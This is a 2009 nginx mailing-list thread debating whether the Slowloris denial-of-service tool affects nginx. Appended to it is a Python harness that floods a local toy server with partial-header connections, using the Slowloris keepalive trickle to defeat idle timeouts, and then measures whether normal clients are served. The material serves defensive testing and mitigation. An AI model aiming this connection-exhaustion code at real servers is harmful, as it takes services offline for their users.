DoS attack in the wild

Cliff Wells cliff at develix.com
Sat Jun 20 00:52:06 MSD 2009


On Fri, 2009-06-19 at 16:24 -0400, E. Johnson wrote:
> "Welcome to Slowloris - the low bandwidth, yet greedy and poisonous
> HTTP client!"
> 
> 
> http://ha.ckers.org/slowloris/

I've already seen that.  What I'd like to see is what data the OP
extracted from his tests to determine that Nginx is also vulnerable.

Apache and IIS are clearly vulnerable due to their threaded architecture
(they consume a relatively large amount of memory with each connection,
which makes this sort of attack easy).  With Nginx this isn't true, so
I suspect the correct place to address resource consumption lies in the
underlying OS's TCP stack settings rather than in nginx.conf (but of
course, I'm willing to stand corrected if the OP's tests showed
otherwise).

In short, the attack effectively simulates what would happen if
thousands of 1200 baud dialup users simultaneously accessed a website.
Nginx should be as close to ideal as you can get for this situation,
provided your OS is properly tuned and has enough resources to handle
that many concurrent connections.

Cliff

> On Fri, Jun 19, 2009 at 4:10 PM, Neelesh Gurjar <neel.hjs at gmail.com> wrote:
>
>         Hello,
>
>         Can anybody tell how to test a DoS attack on a webserver, please?
>
>         Regards
>         NeeleshG
>
>         On Sat, Jun 20, 2009 at 12:52 AM, Cliff Wells <cliff at develix.com> wrote:
>
>                 On Fri, 2009-06-19 at 21:45 +0300, luben karavelov wrote:
>                 > A DoS attack against a number of HTTP servers is available and
>                 > has hit Slashdot today:
>                 >
>                 > http://it.slashdot.org/story/09/06/19/1243203/Attack-On-a-Significant-Flaw-In-Apache-Released
>                 >
>                 > Out of the box nginx is also vulnerable (I have tested it on
>                 > the latest 0.7 installation).
>
>                 What were the results of your tests?  I can see Apache being
>                 vulnerable to this, given the amount of resources it requires
>                 per connection, but Nginx should be much less susceptible.  The
>                 only resource I'd expect to see exhausted might be sockets,
>                 which can be tuned at the OS level.
>
>                 Cliff
>
>                 --
>                 http://www.google.com/search?q=vonage+sucks
>
>         --
>         Regards
>         NeeleshG
>
>         LINUX is basically a simple operating system, but you have to be a
>         genius to understand the simplicity
>
-- 
http://www.google.com/search?q=vonage+sucks
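A test harness for the Slowloris scenario discussed in this thread, added here as an example (it is not code from the thread, from the Slowloris tool or from nginx). It answers the question Cliff keeps asking, "what did the tests show?", with a measurement rather than an impression: it fills every connection slot of a server with clients that send a partial request header and then go quiet, and then checks whether a well-behaved client can still get a response. The target is a deliberately simple thread-per-connection server that runs in-process on 127.0.0.1, so everything works offline; its fixed pool of slots stands in for whatever a real server pins per connection, and its idle timeout on header reads stands in for nginx's client_header_timeout. All names, constants and timings below are the example's own choices. The third trial also shows the Slowloris keepalive trick: trickling one bogus header line per interval resets a purely idle-based timeout, so that defence alone is not enough.

```python
import socket
import threading
import time

PARTIAL_REQUEST = b"GET / HTTP/1.1\r\nHost: localhost\r\n"  # header block never terminated
FULL_REQUEST = PARTIAL_REQUEST + b"\r\n"                     # what a well-behaved client sends
OK_RESPONSE = b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\nConnection: close\r\n\r\nok"


class ToyServer:
    """Thread-per-connection server: `max_conns` slots, idle timeout on header reads.
    `header_timeout=None` is the vulnerable setting; a small value plays client_header_timeout."""
    def __init__(self, max_conns, header_timeout):
        self.slots = threading.Semaphore(max_conns)  # what every connection pins until it is done
        self.header_timeout = header_timeout
        self.timed_out = 0                    # slow clients evicted by the timeout
        self._lock = threading.Lock()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(("127.0.0.1", 0))      # loopback, ephemeral port: runs offline
        self.sock.listen(128)
        self.sock.settimeout(0.1)             # accept() polls so close() can end the loop
        self.port = self.sock.getsockname()[1]
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            try:
                conn, _ = self.sock.accept()
            except socket.timeout:
                continue
            except OSError:                   # listening socket closed
                return
            threading.Thread(target=self._handle, args=(conn,), daemon=True).start()

    def _handle(self, conn):
        with self.slots:                      # held for as long as the client dawdles
            conn.settimeout(self.header_timeout)
            buf = b""
            try:
                while b"\r\n\r\n" not in buf:  # read until the header block is complete
                    chunk = conn.recv(1024)
                    if not chunk:
                        return
                    buf += chunk
                conn.sendall(OK_RESPONSE)
            except socket.timeout:            # eviction: the defence doing its job
                with self._lock:
                    self.timed_out += 1
            finally:
                conn.close()

    def close(self):
        self.sock.close()


def open_slow_connections(port, count):
    """`count` connections that each send a partial header and then go quiet."""
    socks = [socket.create_connection(("127.0.0.1", port)) for _ in range(count)]
    for s in socks:
        s.sendall(PARTIAL_REQUEST)
    return socks


def probe(port, timeout):
    """Does a well-behaved client still get a 200 within `timeout` seconds?"""
    try:
        with socket.create_connection(("127.0.0.1", port), timeout=timeout) as s:
            s.sendall(FULL_REQUEST)
            return s.recv(1024).startswith(b"HTTP/1.1 200")
    except OSError:                           # refused, reset or timed out
        return False


def run_trial(header_timeout, trickle_every=None, max_conns=8, probe_timeout=3.0):
    """Fill every slot with slow clients, then measure whether a normal client is served."""
    srv = ToyServer(max_conns, header_timeout)
    attackers = open_slow_connections(srv.port, max_conns)
    stop = threading.Event()
    def keepalive():                          # Slowloris trick: a bogus header line per interval
        while trickle_every is not None and not stop.wait(trickle_every):
            for s in attackers:               # resets the server's idle timer on every connection
                try:
                    s.sendall(b"X-a: b\r\n")
                except OSError:
                    pass
    threading.Thread(target=keepalive, daemon=True).start()
    time.sleep(0.3)                           # let every slow connection claim a slot first
    served = probe(srv.port, probe_timeout)
    stop.set()
    for s in attackers:
        s.close()
    srv.close()
    return {"served": served, "timed_out": srv.timed_out}


if __name__ == "__main__":
    for hto, every in [(None, None), (1.0, None), (1.0, 0.25)]:
        print(f"header_timeout={hto} trickle_every={every}: {run_trial(hto, every)}")
```

Running the module prints one line per configuration: with no header timeout the probe is never served; with a 1 s timeout it is served as soon as the first slow client is evicted (`timed_out` counts the evictions, which nginx reports as 408s); and with the attackers trickling faster than the timeout the probe fails again even though the timeout is set. Against a real nginx the equivalent check is to point the slow clients at it, run the probe from a second host, and watch `worker_connections`, the per-worker file-descriptor limit and the 408 count in the access log. Whether a given server's header timeout is reset by every byte received or caps the total time spent reading the header is exactly the kind of thing such a test should establish, and it is the reason a per-source connection cap (nginx's `limit_conn`) is usually combined with the timeout.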





